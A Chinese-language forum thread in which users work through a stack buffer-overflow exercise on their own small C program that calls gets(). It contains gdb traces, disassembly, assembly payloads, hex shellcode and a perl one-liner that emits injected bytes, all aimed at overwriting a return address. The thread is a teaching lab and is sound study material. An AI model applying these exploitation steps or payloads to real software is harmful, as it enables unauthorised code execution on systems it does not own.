一次缓冲区溢出攻击试验

kj501

一次缓冲区溢出攻击试验

这是有人问我的题目，由于这段时间工作紧张，一直没有时间仔细考虑。这两天稍微有点空闲，就把它给做出来了。

试验用的代码如下：

1. 
   
2. #include <stdio.h>
   
3. 
   
4. int main(int argc, char **argv)
   
5. {
   
6.     int value;
   
7.     char buf[80];
   
8.     gets(buf);
   
9.     if (value == 0x0a0a0a0a)
   
10.         printf("ok\n");
    
11. }
    

复制代码

1.编译程序，先用gdb跟踪调试，找到value,buf的地址和ebp的值。

1. 
   
2. kj501@UsbLinux c $ gdb a.out
   
3. GNU gdb 6.0
   
4. Copyright 2003 Free Software Foundation, Inc.
   
5. GDB is free software, covered by the GNU General Public License, and you are
   
6. welcome to change it and/or distribute copies of it under certain conditions.
   
7. Type "show copying" to see the conditions.
   
8. There is absolutely no warranty for GDB.  Type "show warranty" for details.
   
9. This GDB was configured as "i686-pc-linux-gnu"...Using host libthread_db
   
10. library "/lib/libthread_db.so.1".
    
11. 
    
12. (gdb) l
    
13. 1       #include <stdio.h>
    
14. 2
    
15. 3       int main(int argc, char **argv)
    
16. 4       {
    
17. 5           int value;
    
18. 6           char buf[80];
    
19. 7           gets(buf);
    
20. 8           if (value == 0x0a0a0a0a)
    
21. 9               printf("ok\n");
    
22. 10      }
    
23. (gdb) b 7
    
24. Breakpoint 1 at 0x80483c4: file tt.c, line 7.
    
25. (gdb) r
    
26. Starting program: /home/kj501/program/c/a.out
    
27. warning: Unable to find dynamic linker breakpoint function.
    
28. GDB will be unable to debug shared library initializers
    
29. and track explicitly loaded dynamic code.
    
30. 
    
31. Breakpoint 1, main (argc=1, argv=0xbffff454) at tt.c:7
    
32. 7           gets(buf);
    
33. (gdb) print &value
    
34. $1 = (int *) 0xbffff3ec
    
35. (gdb) print &buf
    
36. $2 = (char (*)[80]) 0xbffff390
    
37. (gdb) print $ebp
    
38. $3 = (void *) 0xbffff3f8
    

复制代码

由此得到&value=0xbffff3ec,&buf=0xbfff390,%ebp=0xbffff3f8，自然，0xbffff3fc(%ebp+4)就是ret地址了。
2.再继续跟踪，找到main函数结束的返回的__libc_start_main ()的地址。

1. 
   
2. (gdb) r
   
3. Starting program: /home/kj501/program/c/a.out
   
4. warning: Unable to find dynamic linker breakpoint function.
   
5. GDB will be unable to debug shared library initializers
   
6. and track explicitly loaded dynamic code.
   
7. dsa
   
8. 
   
9. Breakpoint 1, main (argc=1, argv=0xbffff454) at tt.c:8
   
10. 8           if (value == 0x0a0a0a0a)
    
11. (gdb) display /x $pc
    
12. 1: /x $pc = 0x80483cf
    
13. (gdb) si
    
14. 0x080483d6      8           if (value == 0x0a0a0a0a)
    
15. 1: /x $pc = 0x80483d6
    
16. (gdb) si
    
17. 10      }
    
18. 1: /x $pc = 0x80483e4
    
19. (gdb) si
    
20. 0x080483e5 in main (argc=134513588, argv=0x1) at tt.c:10
    
21. 10      }
    
22. 1: /x $pc = 0x80483e5
    
23. (gdb) si
    
24. 0xb7eed880 in __libc_start_main () from /lib/libc.so.6
    
25. 1: /x $pc = 0xb7eed880
    

复制代码

得到__libc_start_main的地址0xb7eed880。
3.反汇编mian函数，得到执行语句if (value == 0x0a0a0a0a)的指令地址：

1. 
   
2. (gdb) disas main
   
3. Dump of assembler code for function main:
   
4. 0x080483b4 <main+0>:    push   %ebp
   
5. 0x080483b5 <main+1>:    mov    %esp,%ebp
   
6. 0x080483b7 <main+3>:    sub    $0x78,%esp
   
7. 0x080483ba <main+6>:    and    $0xfffffff0,%esp
   
8. 0x080483bd <main+9>:    mov    $0x0,%eax
   
9. 0x080483c2 <main+14>:   sub    %eax,%esp
   
10. 0x080483c4 <main+16>:   lea    0xffffff98(%ebp),%eax
    
11. 0x080483c7 <main+19>:   mov    %eax,(%esp,1)
    
12. 0x080483ca <main+22>:   call   0x80482bc
    
13. 0x080483cf <main+27>:   cmpl   $0xa0a0a0a,0xfffffff4(%ebp)
    
14. 0x080483d6 <main+34>:   jne    0x80483e4 <main+48>
    
15. 0x080483d8 <main+36>:   movl   $0x80484e4,(%esp,1)
    
16. 0x080483df <main+43>:   call   0x80482dc
    
17. 0x080483e4 <main+48>:   leave
    
18. 0x080483e5 <main+49>:   ret
    
19. End of assembler dump.
    

复制代码

4.编译写一个汇编程序：

1. 
   
2. .section .data
   
3. .section .text
   
4. .global _start
   
5. _start:
   
6. movl $0xb7eed880,4(%ebp)
   
7. 
   
8. movl $0xaaaaaaaa,%eax
   
9. andl $0x0f0f0f0f,%eax
   
10. subl $80,%esp
    
11. movl $0xbffff3ec,%ebx
    
12. movl %eax,(%ebx)
    
13. 
    
14. movl $0x80483cf,%eax
    
15. call *%eax
    

复制代码

这段汇编主要有三个部分，第一部分主要是保证缓冲溢出程序后能正常结束。不然就只能得到段错误。
第二部分是用或的方式把%eax的值改为0x0a0a0a0a，然后再写到value的地址去。之所以要subl $80,%esp，是要保证value的地址在堆栈范围内，才能正常读写。
第三部分，以调用函数的方式，将程序的执行转到main函数中if (value == 0x0a0a0a0a)处继续进行。
5.将汇编代码转为shellcode。
一般常用的做法是把shellcode保存在环境变量中，我的习惯做法是用hexedit编译一个文件，在里面写上shellcode的内容。然后把它重定向给可执行程序。

1. 
   
2. bash-2.05b$ as vv.s -o vv.o
   
3. bash-2.05b$ objdump -d vv.o
   
4. 
   
5. vv.o：     文件格式 elf32-i386
   
6. 
   
7. 反汇编 .text 节：
   
8. 
   
9. 00000000 <_start>:
   
10.    0:   c7 45 04 80 d8 ee b7    movl   $0xb7eed880,0x4(%ebp)
    
11.    7:   b8 aa aa aa aa          mov    $0xaaaaaaaa,%eax
    
12.    c:   25 0f 0f 0f 0f          and    $0xf0f0f0f,%eax
    
13.   11:   83 ec 50                sub    $0x50,%esp
    
14.   14:   bb ec f3 ff bf          mov    $0xbffff3ec,%ebx
    
15.   19:   89 03                   mov    %eax,(%ebx)
    
16.   1b:   b8 cf 83 04 08          mov    $0x80483cf,%eax
    
17.   20:   ff d0                   call   *%eax
    
18. bash-2.05b$
    

复制代码

objdump结果的左边就是二进制机器码。把它用hexedit编辑到作为shellcode使用的文件中。

1. 
   
2. bash-2.05b$ hexedit shellcode.txt
   
3. 
   
4. 00000000   90 90 90 90  C7 45 04 80  D8 EE B7 B8  AA AA AA AA  25 0F 0F 0F  0F 83 EC 50  .....E..........%......P
   
5. 00000018   BB EC F3 FF  BF 89 03 B8  CF 83 04 08  FF D0 90 90  90 90 90 90  90 90 90 90  ........................
   
6. 00000030   90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ........................
   
7. 00000048   90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ........................
   
8. 00000060   90 90 90 90  90 90 90 90  F8 F3 FF BF  90 F3 FF BF  00                        .................
   

复制代码

shellcode的长度要进行计算，从0xbffff390到0xbffff400一共是0x70个字节,最后的一个00是我在试验时加的，完全可以去掉的。
0xbffff3fc地址最关键，必须改为0xbffff390，以便跳转的buf的地址所在处。为也保持%ebp不变，所以0xbffff3f8要维持原样。
其余没有使用的空闲地址，一律用0x90填充。
6.在gdb中检验结果：

1. 
   
2. kj501@UsbLinux c $ gdb a.out
   
3. GNU gdb 6.0
   
4. Copyright 2003 Free Software Foundation, Inc.
   
5. GDB is free software, covered by the GNU General Public License, and you are
   
6. welcome to change it and/or distribute copies of it under certain conditions.
   
7. Type "show copying" to see the conditions.
   
8. There is absolutely no warranty for GDB.  Type "show warranty" for details.
   
9. This GDB was configured as "i686-pc-linux-gnu"...Using host libthread_db
   
10. library "/lib/libthread_db.so.1".
    
11. 
    
12. (gdb) r < shellcode.txt
    
13. Starting program: /home/kj501/program/c/a.out < shellcode.txt
    
14. warning: Unable to find dynamic linker breakpoint function.
    
15. GDB will be unable to debug shared library initializers
    
16. and track explicitly loaded dynamic code.
    
17. ok
    
18. 
    
19. Program exited with code 03.
    
20. (gdb)
    

复制代码

OK! 执行成功！程序也正常退出了。
但是，如果不在gdb中执行，会出现非法指令的提示，估计可能是指令对齐造成的。
需要注意的是，每个机器的情况不一样，需要自己根据实际情况进行相应的修正，仅仅靠碰运气是很难成功的。

弥敦路九号

强。啥时候才能到您这水平。看来不能骄傲，还得努力。

rorot

感谢Kj501版主的解答。 我的想法是
1 gdb 检查当执行到if(value==0x0a0a0a0a) 时ebp, esp的值;
2 溢出修改ret返回地址
3 当跳转到shellcode(栈里)执行时：用第1步记录的ebp,esp 恢复了ebp,esp的值; 产生一个0x0a0a0a0a的值，赋给value地址;
4 重新修改ret地址的值为原来溢出前的返回地址.
4 直接跳转到if(value==0x0a0a0a0a0a) 处.... 正常结束.

1. 
   
2. BITS 32
   
3. jmp callit;
   
4. doit:
   
5.         mov     long     eax,   0xbffffcdc;
   
6.         mov     long    [eax],  0x0b0b0b0b;
   
7.         sub      long    [eax],  0x01010101;
   
8.         mov     long     eax,   0xbffffcec;
   
9.         mov     long    [eax],  0x40036dc6;
   
10.         mov     long     esp,   0xbffffc70;
    
11.         mov     long     ebp,   0xbffffce8;   
    
12.         mov     long     eax,   0x080483f9;
    
13.         jmp     long     eax;
    
14. 
    
15. callit:
    
16.         call doit;
    

复制代码

这是生成的shellcode

1. 
   
2. perl -e 'print "\x90" x 36 .
   
3.         "\xe9\x2d\x00\x00\x00\xb8\xdc\xfc\xff\xbf\xc7\x00\x0b\x0b\x0b" .
   
4.         "\x0b\x81\x28\x01\x01\x01\x01\xb8\xec\xfc\xff\xbf\xc7\x00\xc6" .
   
5.         "\x6d\x03\x40\xbc\x70\xfc\xff\xbf\xbd\xe8\xfc\xff\xbf\xb8\xf9" .
   
6.         "\x83\x04\x08\xff\xe0\xe8\xce\xff\xff\xff\x90" .
   
7.         "\x90" x 12 . "\x18\xfd\xff\xbf" . "\xe0\xfc\xff\xbf"'
   
8. 
   

复制代码

我觉得kj501版主的方法比我的好的多，学习！

kj501

呵呵，条条大路通罗马！基本的原理都是一样的。

kj501

Post by rorot

这是生成的shellcode

1. 
   
2. perl -e 'print "\x90" x 36 .
   
3.         "\xe9\x2d\x00\x00\x00\xb8\xdc\xfc\xff\xbf\xc7\x00\x0b\x0b\x0b" .
   
4.         "\x0b\x81\x28\x01\x01\x01\x01\xb8\xec\xfc\xff\xbf\xc7\x00\xc6" .
   
5.         "\x6d\x03\x40\xbc\x70\xfc\xff\xbf\xbd\xe8\xfc\xff\xbf\xb8\xf9" .
   
6.         "\x83\x04\x08\xff\xe0\xe8\xce\xff\xff\xff\x90" .
   
7.         "\x90" x 12 . "\x18\xfd\xff\xbf" . "\xe0\xfc\xff\xbf"'
   
8. 
   

复制代码

我觉得kj501版主的方法比我的好的多，学习！

这段shellcode中有0x00，这相当于'\0'，在输入时会导致shellcode被中断的吧。

rorot

gets()导致中断的是0x0a 和 EOF(-1), 0x00不会被截断的：）

$ cat gets.c
int main(int argc, char** argv)
{
        int i;
        char buf[64];
        gets(buf);
        
        for (i = 0; i<4; ++i)
                printf("x%02x", buf);
        printf("\n");
        return 0;
}

$ cc gets.c -o gets
$ perl -e 'print "\x00\x01\x02\x03"' | ./gets
x00x01x02x03

spaced

有个疑问，直接将地址值(&buf和&value)写入代码中是不是不太合适。
难道每次代码运行的地址分配一样？
还有怎样方便的形成shellcode.txt，能把过程说清楚一些么？
谢谢。

kj501

Post by spaced
有个疑问，直接将地址值(&buf和&value)写入代码中是不是不太合适。
难道每次代码运行的地址分配一样？
还有怎样方便的形成shellcode.txt，能把过程说清楚一些么？
谢谢。

代码运行时的地址在连接时已经确定。不信你可以用gdb跟踪看看。
我的shellcode.txt是直接用hexedit编辑的。一般的做法是用一段程序输出到一个环境变量中。

spaced

不一样啊(我用的是rh7.3)。请看下面:

1. 
   
2. [root@localhost ccode]# gdb over
   
3. GNU gdb Red Hat Linux (5.1.90CVS-5)
   
4. Copyright 2002 Free Software Foundation, Inc.
   
5. GDB is free software, covered by the GNU General Public License, and you are
   
6. welcome to change it and/or distribute copies of it under certain conditions.
   
7. Type "show copying" to see the conditions.
   
8. There is absolutely no warranty for GDB.  Type "show warranty" for details.
   
9. This GDB was configured as "i386-redhat-linux"...
   
10. (gdb) b 6
    
11. Breakpoint 1 at 0x8048446: file bufoverflow.c, line 6.
    
12. (gdb) r
    
13. Starting program: /home/zyl/ccode/over
    
14. 
    
15. Breakpoint 1, main (argc=1, argv=0xbfffe924) at bufoverflow.c:6
    
16. warning: Source file is more recent than executable.
    
17. 
    
18. 6         char buf[80] ;
    
19. (gdb) print &value
    
20. $1 = (int *) 0xbfffe8ac
    
21. (gdb) print &buf
    
22. $2 = (char (*)[80]) 0xbfffe850
    
23. (gdb) print $ebp
    
24. $3 = (void *) 0xbfffe8b8
    
25. 
    
26. 
    
27. [root@localhost ccode]# gdb over
    
28. GNU gdb Red Hat Linux (5.1.90CVS-5)
    
29. Copyright 2002 Free Software Foundation, Inc.
    
30. GDB is free software, covered by the GNU General Public License, and you are
    
31. welcome to change it and/or distribute copies of it under certain conditions.
    
32. Type "show copying" to see the conditions.
    
33. There is absolutely no warranty for GDB.  Type "show warranty" for details.
    
34. This GDB was configured as "i386-redhat-linux"...
    
35. (gdb) b 6
    
36. Breakpoint 1 at 0x8048446: file bufoverflow.c, line 6.
    
37. (gdb) r
    
38. Starting program: /home/zyl/ccode/over
    
39. 
    
40. Breakpoint 1, main (argc=1, argv=0xbfffe8a4) at bufoverflow.c:6
    
41. warning: Source file is more recent than executable.
    
42. 
    
43. 6         char buf[80] ;
    
44. (gdb) print &value
    
45. $1 = (int *) 0xbfffe82c
    
46. (gdb) print &buf
    
47. $2 = (char (*)[80]) 0xbfffe7d0
    
48. 
    

复制代码

kj501

你没有理解我说的“代码运行时的地址在连接时已经确定”是什么意思。我的意思是说只要一个程序已经被编译链接好了，每次运行时，它的地址都不会改变。并不是说每次编译或者在不同的环境下编译，它们的地址不会改变。
你的编译环境和我的不一样，具体的变量地址发生变化，是很正常的。
如果你想做缓冲区溢出攻击，就必须根据你的实际情况，调整shellcode中的参数。